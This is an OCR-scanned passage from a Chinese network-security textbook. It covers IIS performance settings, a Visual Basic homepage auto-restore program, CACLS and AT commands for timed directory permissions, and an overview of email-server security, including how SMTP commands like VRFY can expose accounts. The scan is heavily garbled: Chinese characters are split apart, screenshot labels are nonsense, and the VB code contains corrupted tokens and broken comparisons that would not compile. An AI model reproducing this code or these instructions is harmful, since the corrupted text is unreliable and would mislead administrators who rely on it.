CPU 的 IIS 5. 0 计算 机 执行 效率 几乎 是 一 个 CPU 计算 机 的 两 倍 ,4 个 CPU 的 IIS 5.0 计算 
机 执行 效率 几乎 是 一 个 CPU 计算 机 的 4 倍 。 


857 不 启用 ASP 检 错 功能 


不 启用 ASP 检 错 功能 可 以 提高 IIS 服务 器 的 执行 效率 。 不 启用 ASP 检 错 功能 的 方法 ， 
在 “Internet 服务 管理 员 ” 中 ,选择 整个 IIS 服务 器 或 Web 站 点 的 起 始 目 录 , 然 后 右 击 “ 主 目 
录 ”, 单 击 “ 配 置 " 按 钮 ,打开 “应 用 程序 调试 ”选项 卡 ,取消 选中 “启用 ASP 服务 器 端 脚本 调 
试 " 和 “启用 ASP 客户 端 脚 本 调试 " 复 选 框 ,如 图 8. 19 所 示 。 


应 用 程序 映射 | 应 用 程序 选项 应 用 程序 调试 | 
调试 标志 
厂 区 用 ASP 服务 器 吴 现 丰 调试 (E)] 


厂 启用 ASP 客户 端 脚 本 调试 (N) 


县 本 档 误 消 包 
发 送 详细 ASP 错误 消息 给 客户 (8) 
改 送 文本 模 误 消息 纺 客 户 (D) : 


图 8.19 取消 ASP 检 错 功能 
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858 静态 网 页 采用 HTTP 压缩 


如 果 静 态 网 页 采用 HTTP 压缩 ,可 以 减少 IIS 服务 器 20% 的 传输 量 。 

HTTP 压缩 功能 启用 或 关闭 ,必须 针对 整 台 IIS 服务 器 来 设 定 。 用 户 端 使 用 IE 5.0 浏 
览 器 连接 到 已 经 启用 HTTP 压缩 IIS 6.0 的 Web 服务 器 , 才 有 HTTP 压缩 功能 。 

启用 HTTP 压缩 功能 的 步骤 如 下 : 在 “Internet 信息 服务 (IIS) 管 理 器 "中, 选择“ 网站” 
1* 属 性 ”1“ 服 务 ”选项 。 然 后 选中 “压缩 静态 文件 ” 复 选 框 进行 压缩 静态 文件 ,注意 不 要 选中 
“压缩 应 用 程序 文件 ”, 如 图 8. 20 所 示 。 


EI 2 
网 | 性 能 | IsAT 名 器 | 主 上 录 | 文告 | 
目录 安全 性 。 | 。 MOTP 头 | 。 自 定义 错误 服务 

『 隔离 模式 


厂 以 ITS 5.0 隔离 模式 运行 YYY 服务 I) 


Ca |] mw | mew | Ww | 


图 8.20 压缩 网 站 中 的 静态 文件 


动态 产生 的 内 容 文件 (压缩 应 用 程序 文件 ) 也 可 以 压缩 ,但 是 耗费 CPU 处 理 时 间 ,一般 
情况 下 建议 不 压缩 。 
执行 效率 可 使 用 一 些 工 具 来 测试 ,如 可 使 用 加 压 测 试 工具 (Stress Tool) ,下载 网 址 ， 


http://webtool. rte. microsoft. com 。 


8.6 自 定 义 IIS 安全 策略 


虽然 使 用 者 可 以 通过 增强 系统 的 安全 性 来 提高 IIS 的 安全 性 ,也 可 以 通过 配置 IIS 的 安 
全 ,性 能 选项 来 保证 IIS 的 健壮 性 ,但 这 些 手 段 都 有 其 不 足 的 地 方 ,有 时 为 了 性 能 要 放弃 安 
全 ,有 时 为 了 安全 又 要 放弃 性 能 。 其 实 只 要 懂得 一 些 编程 的 基本 知识 ,就 可 以 动手 开发 出 符 
合用 户 自身 需求 的 安全 策略 。 


861 防止 数据 库 注 入 攻击 


这 部 分 内 容 主 要 涉及 编写 ASP 程序 时 ,对 数据 提交 的 安全 防范 措施 ,第 7 章 中 有 详细 
的 描述 。 
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862 主页 自动 恢复 程序 


下 面 是 用 VB 写 的 一 个 自动 恢复 主页 的 程序 ,时 间 和 目录 都 可 以 在 INI 文 件 中 设置 ,此 
程序 需要 一 个 名 为 inifile. dll 的 文件 。 


Option Explicit 
Dim MainDir,BackupDir 
Dim CheckTime, Start ,Finish,TotalTime, ErrMsg 
Function FileExists(ByVal Path) Rs Integer 
On Error GoTo DIR_ERROR 
Dims 
s=Dir(Path) 
If Trim(s) = Empty Then 
Exit Function 
End If 
FileExists = True 
Exit Function 
DIR_ERROR: 
Exit Function 
End Function 
"检查 文件 
Sub CheckFile(ByVal CheckFileName) 
On Error Resume Next 
Dim fs,fl,f2,sl,s2 
sl="0" 
人 
Set fs = CreateObject("Scripting. FileSystemObject") 
If FileExists(MainDir + CheckFileName) Then 
Set fl = fs. GetFile(MainDir + CheckFileName) 
Set f2 = fs. GetFile(BackupDir + CheckFileName) 
sl=f£1.DateLastModified 
s2 = f2. DateLastModified 
End If 
If s1 忆 之 s2 Then 
fs. CopyFile BackupDir + CheckFileName,MainDir,True 
End If 
End Sub 
Private Sub Form Load() 
On Error Resume Next 
If Right(App. Path,1) = "\" Then 
IniFile. IniFileName = App. Path & "watcher. ini" 
Else 
IniFile. IniFileName = App. Path & "\" & "watcher. ini" 
End If 
MainDir = IniFile. GetSet("watcher","MainDir","Z:\") 
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BackupDir = IniFile. GetSet("watcher","BackupDir" ,"Z:\") 
CheckTime = IniFile. GetSet("watcher","CheckTime" ,10) ' 设 置 暂停 时 间 
If CheckTime 一 64 Then 
CheckTime = CheckTime * 1000 
SysTimer. Interval = CheckTime 
End If 
"只 运行 一 次 
If App.PrevInstance Then 
ErrMsg= MsgBox(" 系 统 已 经 有 一 个 程序 正在 运行 中 !" ,VBCritical, "系统 错误 ”) 
End 
End If 
"检查 目录 是 否 存在 
If Not FileExists(MainDir) Then 
ErrMsg = MsgBox(MainDir + "目录 没有 找到 ,系统 终止 1" ,VBCritical," 系 统 错误 ") 
End 
End If 
If Not FileExists(BackupDir) Then 
ErrMsg = MsgBox(BackupDir + "目录 没有 找到 ,系统 终止 1" ,VBCritical," 系 统 错误 ") 
End 
End If 
' 开 始 定时 检查 文件 
"开始 遍历 目录 内 所 有 文件 
End Sub 
Private Sub SysTimer_Timer() 
Dim fs,f,fl,fc,s 
Set fs = CreateObject("Scripting. FileSystemObject") 
Set f= fs. GetFolder(BackupDir) 
Set fc = f.Files 
For Each fl In fc 
CheckFile (f1. Name) 
Next 
End Sub 


863 定时 打开 或 关闭 IS 服务 器 目录 
有 时 需要 定时 打开 或 关闭 IIS 服务 器 的 目录 ,这 时 就 要 设置 相应 目录 的 权限 ,使 访问 者 
在 规定 的 时 间 访 问 这 些 文件 。 为 了 达到 这 个 目的 ,可 以 设置 这 个 目录 的 读 权限 何 时 打开 或 
关闭 。 使 用 Windows NT 下 的 CACLS 和 AT 命令 ,可 以 实现 上 述 目的 。 


1. CACLS 命令 使 用 格式 


CACLS FileName [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] 


上 述 参数 的 含义 如 下 : 
。 FileName 显示 ACL。 
。 / 工 更 改 当 前 目录 和 所 有 子 目录 中 指定 文件 的 ACL。 
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/E 编辑 但 不 替代 ACL。 

/C 在 访问 禁止 .错误 时 继续 。 

/G user:perm 对 指定 用 户 赋予 访问 权限 ,perm 可 以 是 R( 读 权限 )、C( 写 权限 )、 
F( 完 全 控制 权限 ) 。 

/R user 撤销 指定 用 户 的 访问 权限 ( 仅 在 与 /E 一 起 使 用 时 有 效 ) 。 

/P user:perm 替代 指定 用 户 的 访问 权限 ,perm 可 以 是 :N( 没 有 权限 )、R( 读 权限 )、 
C( 写 权限 )、F( 完 全 控制 权限 )。 

/D user 禁止 指定 用 户 访问 。 

在 命令 中 可 以 使 用 通配符 指定 多 个 文件 ,也 可 以 在 命令 中 指定 多 个 用 户 。 

CACLS 命令 应 用 举例 : 

CACLS D:\Wwwroot\OQutside /T /E /C /G everyone:r 

给 予 D:\Wwwroot\Outside 目录 及 子 目 录 读 的 权限 。 

CACLS D:NWwwrootN\Outside /T /E /C /R everyone 

撤销 D:\Wwwroot\Outside 目录 及 子 目录 读 的 权限 。 


CACLS D: \Wwwroot\Outside\bbs\ * .htm /E /C /G Everyone:r 


给 予 D:\Wwwroot\Outside\bbs\ * . htm 读 的 权限 。 
2. 定时 自动 执行 命令 


AT 命令 可 以 指出 在 特定 的 日 期 和 时 间 运 行 某 些 命令 和 程序 。 
运行 AT 命令 之 前 必须 先 启动 Schedule 服务 (启动 Schedule 服务 的 方法 : 在 “控制 面 
板 " 中 选择 “服务 ”, 然 后 选 Schedule, 最 后 单 击 “ 启 动 " 按 钮 )。 


3. AT 命令 使 用 格式 


AT [\\Computername] [ [id] [/DELETE] | /DELETE [/YES]]; 


AT [\\Computername| Time [/INTERACTIVE] [ /EVERY:date[ ,...] | /NEXT:date[ ,...]] "command" ; 


上 述 参 数 的 含义 如 下 : 

Computername 指定 远程 计算 机 ,如 果 省 略 这 个 参数 ,命令 会 被 排 定 在 本 机 上 运行 。 
id 指定 给 排 定 进度 命令 的 识别 号 。 

/DELETE 删除 某 个 已 排 定 进度 的 命令 ,如 果 省 略 , 计 算 机 上 所 有 已 排 定 进度 的 命 
令 都 会 被 删除 。 

/YES 用 于 删除 所 有 作业 , 且 不 想 在 运行 删除 时 显示 确认 信息 。 

Time 指定 命令 运行 的 时 间 。 

/INTERACTIVE 允许 作业 在 运行 时 ,与 用 户 通过 桌面 交互 。 
/EVERY:date[,….] 指 定 在 每 周 或 每 月 的 某 日 (或 某 几 日 ) 运 行 命令 。 如 果 省 略 日 
期 则 默认 为 在 每 月 的 本 日 运行 。 

。 Command 可 以 是 NT 命令 ,也 可 以 是 批 处 理 命令 。 

AT 命令 应 用 举例 : 
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使 用 AT 显示 当前 计算 机 上 所 有 的 计划 。 
AT 4 /DELETE 
删除 第 4 个 计划 。 


AT 11:00 "C:\begin. bat" 


每 天 上 午 11: 00 执行 C:\begin. bat 命令 。 


AT 13:00 "C:\end. bat" 

每 天 下 午 1: 00 执行 C:\end. bat 命令 。 

C 盘 下 begin. bat 文件 的 内 容 如 下 : 

CRCLS d:\wwwroot\outside\bbs\ * .htm /e /c /g everyone:r 


C:\end. bat 内 容 : 


CACLS d:\wwwroot\outside\bbs\ * . htm /e /c /r everyone 


习题 


1 
2 
3 
4 


. ASP 的 全 称 是 什么 ? 

.IIS 5.0 和 IIS 6.0 的 重要 区 别 是 什么 ? 

. 如何 配置 Windows 系统 来 保障 IIS 的 安全 ? 

.【 思 考题 ] 如 何 利用 IIS 的 功能 控制 平台 配置 一 个 安全 高 效 的 网 站 平台 ? 
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第 9 章 电子 邮件 的 安全 技术 


电子 邮件 在 人 们 的 工作 生活 中 扮演 着 越 来 越 重 要 的 角色 ,但 同时 电子 邮 
件 也 成 为 病毒 传播 的 载体 ,加 速 了 病毒 的 传播 速度 。 

本 章 要 点 如 下 : 

。 邮件 服务 器 的 现状 和 发 展 趋势 ; 

。 邮件 服务 器 的 工作 原理 和 安全 设置 ; 

。 反 垃圾 邮件 技术 ; 

。 Linux 环境 下 各 种 邮件 服务 器 的 性 能 区 别 。 


9.1 邮件 服务 器 软件 的 现状 


全 球 每 天 发 送 的 电子 邮件 数量 预计 为 12 万 亿 封 .而且 这 个 数字 每 天 都 在 
增长 。 整 个 电子 邮件 服务 器 市 场 大 体 上 分 为 UNIX 平台 和 Windows 平台 两 大 
类 。 在 Linux、Solaris 和 BSD 等 UNIX 平台 领域 ,老牌 的 Sendmail 继续 占据 着 
统治 地 位 ,新 的 竞争 对 手 Exim 和 Postfix 占据 了 剩余 的 市 场 。 虽 然 占 市 场 份额 
最 多 的 UNIX 邮件 服务 器 一 般 都 是 免费 的 软件 ,但 是 软件 的 学 习 难 度 较 大 。 

基于 Windows 操作 系统 的 邮件 服务 器 包括 微软 的 Exchange、ArGoSoft 
邮件 服务 器 专业 版 、Avirt 邮件 服务 器 、CommuniGate 专业 版 、 Eudora 
WorldMail 服务 器 、FTGate PRO、Kerio 邮件 服务 器 、Lotus Domino 和 
Mdaemon 等 。 这 类 软件 大 多 需要 购买 许可 证 ,并 要 根据 用 户 数量 付费 ,应 用 
成 本 比较 高 , 且 这 类 产品 对 资源 的 消耗 也 较 大 。 

有 些 第 三 方 的 邮件 服务 器 产品 可 以 跨 平台 使 用 ,在 本 章 的 试验 章节 中 介 
绍 的 就 是 第 三 方 邮件 产品 的 使 用 。 


911 邮件 安全 成 为 重 中 之 重 


随 着 电子 邮件 在 全 球 的 应 用 大 幅 增长 ,垃圾 邮件 也 在 快速 地 增长 。 这 些 
垃圾 邮件 有 的 只 是 包括 无 聊 的 信息 ,有 的 则 携带 病毒 ,还 有 的 结合 了 “网络 钓 
鱼 ” 进 行 诈骗 。 在 2003 年 初 ,各 种 垃圾 邮件 约 占 全 部 电子 邮件 数 的 40%。 到 
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2004 年 ,这 个 数字 增长 到 60% 左 右 。 可 以 看 出 ,这 个 数字 还 在 逐年 增长 。 

垃圾 邮件 和 病毒 给 企业 造成 的 危害 是 非常 大 的 。 杀 毒 和 反 垃圾 邮件 功能 一 直 是 邮件 服 
务 器 软件 最 普通 的 升级 功能 。 

在 支持 杀毒 功能 方面 ,大 多 数 邮件 服务 器 都 把 这 个 核心 的 工作 交 给 了 第 三 方 杀毒 引擎 。 
一 般 来 说 ,杀毒 防御 措施 需要 单独 购买 许可 证 ,因为 访问 不 间断 的 病毒 定义 更 新 需要 付费 。 

总 之 ,安全 依然 是 2008 年 电子 邮件 服务 器 的 重点 ,同时 邮件 服务 器 处 理 垃圾 邮件 的 能 
力也 会 越 来 越 强 。 预 计 不 久 将 会 出 现 强制 执行 电子 邮件 身份 识别 的 工具 , 它 能 对 来 源 有 疑 
问 的 邮件 进行 检查 。 


912 邮件 的 组 件 与 协作 


邮件 的 协作 功能 并 不 能 为 邮件 服务 器 的 安全 提供 任何 保证 。 它 只 是 为 邮件 服务 器 提供 
了 更 加 丰富 的 功能 。 

使 用 日 历任 务 编排 和 即时 消息 等 协作 工具 的 大 多 数 软件 都 结合 使 用 了 Microsoft 公 
司 的 Exchange 服务 器 和 Outlook 客户 端 软 件 。 一 些 第 三 方 的 电子 邮件 服务 器 也 通过 微软 
的 平台 或 者 建立 自己 的 平台 进入 了 组 件 领 域 。 

例如 Kerio 邮件 服务 器 和 CommuniGate Pro 都 是 可 以 为 Microsoft 公司 的 Outlook 用 
户 提供 MAPI( 消 息 处 理应 用 程序 接口 ) 功 能 的 邮件 服务 器 。 通 过 使 用 MAPI,Outlook 用 户 
能 够 连接 到 这 些 邮 件 服务 器 (而 不 是 Microsoft 公司 的 Exchange 服务 器 ) ,以 便 发 挥 协作 功 
能 的 优势 。 

有 些 产 品 对 组 件 采取 了 不 同 的 方式 。FirstClass 和 FTGate4 消息 服务 器 超越 了 传统 的 
电子 邮件 的 范畴 ,采用 了 协作 功能 。 使 用 自己 的 客户 端 软件 ,如 FirstClass 客户 端 软件 和 
Floosietek 公司 的 SolSight 软件 ,就 可 以 使 用 这 些 协作 功能 。 这 些 厂商 打算 在 服务 器 和 客 
户 端 两 端 完全 取代 而 不 是 集成 Microsoft 公司 的 组 件 。 

随 着 Windows 电子 邮件 服务 器 市 场 上 竞争 的 日 益 激烈 ,组 件 和 协作 工具 将 继续 发 展 ， 
以 便 使 自己 成 为 一 种 与 众 不 同 的 产品 ,并 且 与 Microsoft 公司 Exchange 建立 的 既成 事实 的 
标准 进行 竞争 。 


913 邮件 的 存档 


越 来 越 多 的 电子 邮件 在 法 律 调 查 中 成 为 了 证 据 。 在 某 些 情况 下 ,企业 需要 把 往来 的 电 
子 邮件 保留 长 达 7 年 的 时 间 。 为 了 加 快 提取 电子 邮件 的 速度 和 确保 电子 邮件 的 完整 性 , 存 
档 工具 不 仅 要 保留 详细 的 索引 ,以 加 快 搜索 速度 ,而且 还 要 在 电子 邮件 的 寿命 周期 之 内 跟踪 
事件 记录 的 每 一 次 行动 。 
考虑 到 电子 邮件 存档 的 严格 要 求 , 大 多 数 的 企业 都 把 完成 这 种 繁重 任务 留 给 了 第 三 方 
软件 。 例 如 Microsoft 公司 的 Exchange 服务 器 中 的 “日 志 ” 功 能 。 这 种 功能 能 够 在 一 个 特 
殊 的 包罗 万 象 的 账户 中 复制 所 有 通过 这 个 服务 器 的 邮件 副本 。 


9.2 ”邮件 服务 器 的 发 展 趋势 


电子 邮件 系统 经 过 几 十 年 的 发 展 ,已 经 形成 了 比较 完善 的 技术 体系 。 邮 件 服务 器 系统 
在 保留 了 电子 邮件 系统 最 初 的 收发 邮件 .邮件 存储 等 基本 功能 的 同时 ,融入 了 最 新 的 计算 机 
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与 网 络 技术 ,使 电子 邮件 系统 有 了 全 新 的 面貌 。 
921 Web 邮件 技术 


随 着 Internet 的 日 益 普 及 和 逐步 深入 ,对 于 电子 邮件 系统 来 说 ,单纯 使 用 邮件 客户 端 程 
序 进行 邮件 的 收发 已 经 不 能 满足 用 户 移动 办 公 的 需要 。Web 邮件 技术 的 出 现 ,使 用 户 不 需 
要 在 本 地 安装 电子 邮件 客户 端 软件 ,而 是 可 以 在 任何 地 方 使 用 浏览 器 登录 邮件 服务 器 收发 
邮件 。Web 邮件 最 初 是 免费 的 , 它 的 收入 主要 来 自 广告 的 支持 。 最 早 的 Web 邮件 有 雅虎 
邮箱 和 Microsoft 公司 的 Hotmail 等 ,目前 大 部 分 电子 邮件 用 户 都 使 用 Web 邮件 这 种 方式 。 
越 来 越 多 的 电子 邮件 服务 器 都 将 包含 Web 邮件 功能 。 


922 多 域 邮件 服务 

所 谓 多 域 邮件 服务 , 即 是 用 一 台 物 理 服务 器 为 多 个 独立 注册 Internet 域名 的 企业 或 单 
位 提供 电子 邮件 的 服务 。 在 逻辑 上 ,这 些 企业 和 单位 拥有 自己 独立 的 邮件 服务 器 ,也 可 以 称 
为 虚拟 邮件 服务 器 技术 。 对 于 ISP 提供 商 和 企业 集团 公司 来 说 ,多 域 邮件 服务 器 的 支持 能 
力 是 选择 邮件 服务 器 的 一 个 重要 考虑 因素 。 
923 Linux 邮件 服务 器 


Linux 操作 系统 作为 目前 应 用 最 为 广泛 的 开放 源 代码 操作 系统 ,具有 性 能 稳定 \ 可 靠 性 
高 和 价格 低廉 的 特点 。 使 用 Linux 作为 邮件 服务 器 ,主要 是 可 以 与 Sendmail、MySQL 等 开 
放 源 代码 软件 共同 使 用 ,在 满足 用 户 需求 的 基础 上 降低 了 使 用 成 本 。 


924 安全 防护 


现在 的 邮件 服务 器 在 安全 防护 技术 上 有 了 较 大 的 提高 ,包括 数据 身份 认证 、 传 输 加 密 、 
垃圾 邮件 过 滤 、 邮 件 病毒 过 滤 、 安 全 审计 等 多 项 安全 技术 在 邮件 服务 器 中 都 得 到 了 很 好 的 
应 用 。 


925 多 语言 


目前 仅 我 国 使 用 的 中 文 就 有 若干 字符 集 , 如 GB-18030、GB-2312、Big5 等 ,在 实际 过 程 
中 ,网 络 管理 员 不 可 能 统一 所 有 用 户 的 邮件 客户 端 , 因 此 只 能 要 求 邮 件 服务 器 支持 多 语言 的 
环境 ,使 得 不 同 的 用 户 可 以 顺畅 地 “交流 ”。 
926 远程 监控 和 性 能 调整 


由 于 邮件 服务 器 大 多 处 于 电信 和 机房, 进行 托管 式 管理 ,因此 需要 邮件 服务 器 提供 远程 邮 
件 监 控 的 功能 ,使 用 户 通过 Web 方式, 监控 邮件 服务 器 的 工作 状态 ,包括 在 线 用 户 数 、 邮 件 
处 理 数量 和 速度 、 存 储 空间 使 用 率 等 ,并 且 可 以 随时 对 出 现 的 发 信和 高 峰 和 网 络 攻击 进行 远程 
处 理 。 


927 无 限 可 扩展 能 力 
电子 邮件 系统 应 该 具备 无 限 的 扩展 能 力 ,这 个 能 力主 要 体现 在 邮件 的 处 理 能 力 和 邮件 
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的 存储 能 力 上 。 为 了 能 够 使 邮件 的 处 理 能 力 可 以 无 限 扩展 ,就 需要 引入 集群 和 负载 均衡 技 
术 ,使 应 用 平台 可 以 在 需要 的 时 候 无 限 扩充 ,以 满足 长 期 或 临时 的 业务 需要 。 为 了 便于 邮件 
存储 ,需要 高 性 能 的 邮件 存储 解决 方案 ,最 为 理想 的 应 该 是 存储 区 域 网 络 (Storage Area 
Network,SAN) 技 术 在 邮件 服务 器 领域 的 应 用 。 


9.3 电子 邮件 服务 器 的 安全 性 分 析 


随 着 互联 网 在 全 球 的 发 展 ,电子 邮件 服务 的 规模 也 在 不 断 地 扩大 。 传 统 的 电子 邮件 在 
Internet 上 的 整个 传输 过 程 中 都 使 用 明文 进行 传送 。 用 户 的 电子 邮件 有 可 能 被 人 偷窥 甚至 
被 算 改 ,通过 修改 计算 机 中 的 某 些 配 置 ,可 轻易 地 冒 用 他 人 的 电子 邮件 地 址 发 送 电 子 邮 件 。 
随 着 邮件 病毒 的 日 益 传播 ,大 量 垃 圾 邮件 的 泛滥 ,电子 邮件 及 邮件 服务 器 的 安全 问题 已 越 来 
越 引起 人 们 的 担忧 。 


93.1 邮件 服务 器 的 工作 原理 


邮件 服务 器 是 用 来 接收 和 发 送 电子 邮件 用 的 ,一 般 由 若干 协同 工作 的 小 程序 组 成 。 

在 UNIX/Linux 下 邮件 服务 器 通常 被 分 成 三 个 代理 模块 : 邮件 分 发 代理 (Mail Deliver 
Agent, MDA) 模 块 、 邮 件 传 送 代理 (Mail Transfer Agent,MTA) 模 块 . 邮 件 用 户 代 理 (Mail 
User Agent,MUA) 模 块 。 

MTA 软件 负责 处 理 所 有 接收 和 发 送 的 邮件 。 对 于 每 一 个 外 发 的 邮件 ,MTA 决定 接收 
方 的 目的 地 。 如 果 目 的 主机 是 本 机 ,MTA 将 把 邮件 直接 发 送 到 本 地 的 邮箱 或 是 交 给 本 地 
的 MDA 进行 投递 ; 如 果 目 的 主机 是 远程 的 主机 , 则 MTA 通过 同 这 个 远程 主机 建立 一 条 通 
信 链 路 来 传递 邮件 。 对 于 接收 邮件 的 MTA ,能 够 响应 远程 邮件 服务 器 的 连接 请 求 , 如 果 邮 
件 发 往 本 地 用 户 则 接收 ,否则 转发 或 丢弃 。MDA 软件 只 关注 发 往 本 地 邮件 服务 器 上 用 户 
的 信息 , 它 从 MTA 软件 接收 邮件 后 确保 将 其 发 往 本 地 用 户 的 邮箱 或 是 由 本 地 用 户 指定 的 
某 个 地 点 。MUA 软件 向 用 户 提供 读 取 存在 他 们 邮箱 中 邮件 的 操作 界面 。 用 户 发 送 电 子 邮 
件 时 ,根据 SMTP 协议 和 TCP/IP 协议 要 求 将 邮件 “打包 ”后 送 到 本 地 的 邮件 服务 器 上 ,由 
本 地 邮件 服务 器 负责 将 邮件 发 送 到 目的 用 户 所 在 的 邮件 服务 器 上 。 


932 邮件 服务 器 安全 性 分 析 
1. 协议 的 安全 性 


电子 邮件 协议 是 电子 邮件 系统 的 重要 组 成 部 分 ,通过 这 些 协 议 , 可 以 在 邮件 服务 器 间 传 
递 邮件 ,用 户 也 可 以 从 邮件 服务 器 上 读 取 邮件 。 目 前 常用 的 邮件 协议 有 SMTP、POP3、 
IMAP、MIME。 但 由 于 这 些 协议 本 身 存 在 很 多 漏洞 ,使 得 传输 电子 邮件 很 不 安全 。 黑 客 也 
可 以 利用 这 些 漏洞 攻击 邮件 服务 器 。 下 面 对 这 些 协 议 的 安全 性 作 一 个 简要 分 析 。 

(1) SMTP 的 安全 性 分 析 

SMTP( 简 单 邮件 传输 协议 ) 用 来 在 不 同类 型 的 计算 机 系统 间 传 递 电 子 邮件 及 其 附件 ， 
它 在 25 号 端口 建立 TCP 连接 。SMTP 是 使 用 命令 的 方式 进行 连接 的 建立 和 邮件 的 传送 ， 
由 于 使 用 简单 的 ACSII 码 文本 命令 ,所 以 很 容易 被 截获 ,并 且 很 多 命令 本 身 就 可 以 被 黑客 
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等 恶意 用 户 利用 ,如 以 下 几 个 命令 : 

@O RCPT 命令 。 用 来 定义 邮件 的 接收 地 址 , 当 邮 件 接收 者 不 是 本 地 用 户 时 ,SMTP 服 
务 器 返回 特定 的 信息 码 , 黑 客 可 以 据 此 来 发 现 服务 器 上 的 真实 用 户 账号 。 

@ VRFY 命令 。 判 断 一 个 SMTP 服务 器 是 否 能 将 邮件 发 送 到 特定 的 接收 者 ,如 果 是 
本 地 用 户 , 则 返回 用 户 的 完整 地 址 ,否则 返回 给 客户 否定 的 答复 或 表明 愿意 转发 任何 发 送 到 
远程 用 户 的 邮件 。 该 命令 可 以 使 黑客 检测 到 服务 器 上 用 户 的 邮件 地 址 或 被 垃圾 邮件 发 送 者 
利用 来 转发 垃圾 邮件 。 

@ TRUN 命令 。 人 允许 两 台 计 算 机 在 一 个 TCP 连接 中 进行 双向 邮件 传输 。 通 过 允许 服 
务 器 转换 不 同 客户 端的 角色 ,将 目的 地 是 客户 端 域名 的 邮件 发 给 客户 端 ,服务 器 只 根据 客户 
端 自称 的 名 字 进 行 应 答 。 若 黑客 冒 用 别人 的 域名 ,那么 邮件 服务 器 会 将 所 有 应 发 往 合 法 用 
户 的 邮件 发 给 黑客 。 

(2) POP3、IMAP 和 MIME 协议 的 安全 性 分 析 

邮局 协议 POP3 用 来 从 远程 服务 器 上 收取 邮件 。 它 使 用 的 认证 方法 是 用 户 名 加 口令 的 
方式 ,但 在 客户 端 登录 服务 器 时 采用 明文 方式 传输 ,尤其 是 数据 包 在 同 远程 服务 器 建立 连接 
过 程 中 经 过 情况 未 知 的 网 段 时 容易 被 黑客 截获 。 为 了 增强 安全 性 ,POP3 使 用 AUTH 命令 
安全 地 标示 一 个 用 户 ,但 是 其 中 的 Login 认证 方式 仍然 可 以 使 网 络 中 的 侦 听 者 轻松 地 捕获 
加 密 后 的 用 户 名 和 口令 并 利用 它们 从 另 一 台 客 户 端 上 登录 服务 器 。 

IMAP 协议 是 交互 邮件 访问 协议 , 它 使 用 Login 命令 允许 客户 端 发 送 文 本 方式 的 用 户 
名 和 口令 ,使 用 Authenticate 命令 允许 客户 端 发 送 加 密 方式 的 用 户 名 和 口令 ,但 也 存在 和 
POP3 同样 的 不 安全 因素 。 

MIME 协议 是 多 用 途 互联 网 扩展 协议 ,用 来 将 二 进 制 数据 编码 成 ASCII 文本 在 互联 网 
上 传输 ,但 这 种 方法 并 没有 采取 任何 加 密 措 施 , 所 以 信息 很 容易 被 截获 和 解码 。 


2. 邮件 内 容 的 安全 问题 


邮件 内 容 的 安全 问题 主要 包含 以 下 几 个 方面 。 

(1) 邮件 内 容 的 保密 性 真实 性 

因为 用 SMTP 协议 发 送 邮件 时 ,邮件 是 以 明文 方式 传输 的 ,也 是 以 明文 方式 保存 在 邮 
件 服务 器 的 用 户 邮箱 中 的 。 只 要 能 够 进入 用 户 的 邮箱 (特权 用 户 , 如 系统 管理 员 ) 或 在 传输 
过 程 中 将 邮件 截获 ,就 可 以 看 到 发 送 给 用 户 的 原始 文件 ,甚至 可 以 更 改 邮件 的 内 容 , 而 邮件 
的 接收 者 无 法 知道 所 接收 的 邮件 是 否 真实 。 

(2) 邮件 发 送 者 身份 的 真实 性 

由 于 在 发 邮件 时 不 需要 身份 鉴定 ,任何 人 都 可 以 冒名 发 送 电 子 邮 件 ,所 以 用 户 接收 的 邮 
件 可 能 并 非 是 真实 发 件 人 发 送 的 。 

(3) 电子 邮件 病毒 

电子 邮件 是 传播 病毒 最 常用 的 途径 之 一 。 很 多 著名 的 病毒 都 是 通过 电子 邮件 来 传输 
的 ,如 * 红 色 代码 ?病毒 。 电 子 邮 件 传播 病毒 通常 是 把 病毒 作为 附件 发 送 给 被 攻击 者 。 如 果 
接收 到 该 邮件 的 用 户 不 小 心 打 开 了 附件 ,病毒 即 会 感染 用 户 的 计算 机 ,并 且 现在 大 多 数 电子 
邮件 病毒 往往 在 感染 用 户 的 计算 机 之 后 ,会 自动 打开 用 户 Outlook 的 地 址 短 , 然 后 再 把 病毒 
发 送 给 用 户 地 址 短 上 的 每 一 个 电子 邮箱 ,使 电子 邮件 病毒 能 够 大 面积 传播 。 
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3. 垃圾 邮件 问题 


向 新 闻 组 或 他 人 电子 邮箱 发 送 的 未 经 用 户 准许 .不 受用 户 欢迎 的 、 难 以 退 掉 的 电子 邮件 
或 电子 邮件 列表 ,叫做 垃圾 邮件 (Spam) 。 垃 圾 邮件 是 Internet 技术 发 展 的 产物 ,与 其 他 先 
进 技术 一 样 , 在 为 人 类 服务 的 同时 ,也 不 可 避免 地 被 另外 一 些 人 用 作 相 反 的 目的 。 首 次 关于 
垃圾 邮件 的 记录 是 1985 年 8 月 一 封 通过 电子 邮件 发 送 的 连锁 信 。 历 史上 比较 著名 的 Spam 
事件 是 1994 年 4 月 份 ,Canter 和 Siegel 的 法 律 事务 所 把 一 封 信 发 到 6000 多 个 新 闻 组 ,宣传 
获得 美国 国内 绿卡 的 法 律 支持 。 这 是 第 一 次 使 用 Spam 一 词 来 称呼 垃圾 邮件 ,用 来 描述 新 
闻 或 电子 邮件 的 主动 性 发 布 。 同 时 ,一些 触觉 敏锐 的 商人 立刻 意识 到 了 电子 邮件 带 来 的 商 
机 ,开始 利用 电子 邮件 作 商 业 广 告 。1996 年 4 月 ,人 们 开始 使 用 UCE (Unsolicited 
Commercial E-mail) 来 称呼 垃圾 邮件 ,并 开始 积极 想 办 法 阻止 垃圾 邮件 在 Internet 上 泛滥 。 
在 1997 年 3 月 ,有 人 提出 了 Spam Block( 信 息 阻 断 ) 的 方法 ,即使 用 Remove. To. Reply 的 
工具 来 过 滤 邮 件 地 址 。 随 着 过 滤 垃 圾 邮件 技术 的 发 展 ,垃圾 邮件 制造 者 们 采取 了 更 隐蔽 的 
技术 ,如 伪造 信 头 中 的 发 件 人 ,域名 .邮件 地 址 ,然而 ,这 些 方法 还 是 逃 不 出 IP 地 址 的 过 滤 。 
于 是 ,垃圾 邮件 的 制造 者 开始 寻找 更 为 安全 的 做 法 。 目 前 大 部 分 商业 垃圾 邮件 都 在 利用 其 
他 邮件 服务 器 的 转发 功能 来 发 送 垃圾 邮件 。 


933 邮件 服务 器 安全 解决 方案 
1. 使 用 安全 的 通信 协议 


由 于 电子 邮件 协议 本 身 存 在 一 些 可 以 被 利用 的 漏洞 ,所 以 提高 电子 邮件 服务 器 的 安全 
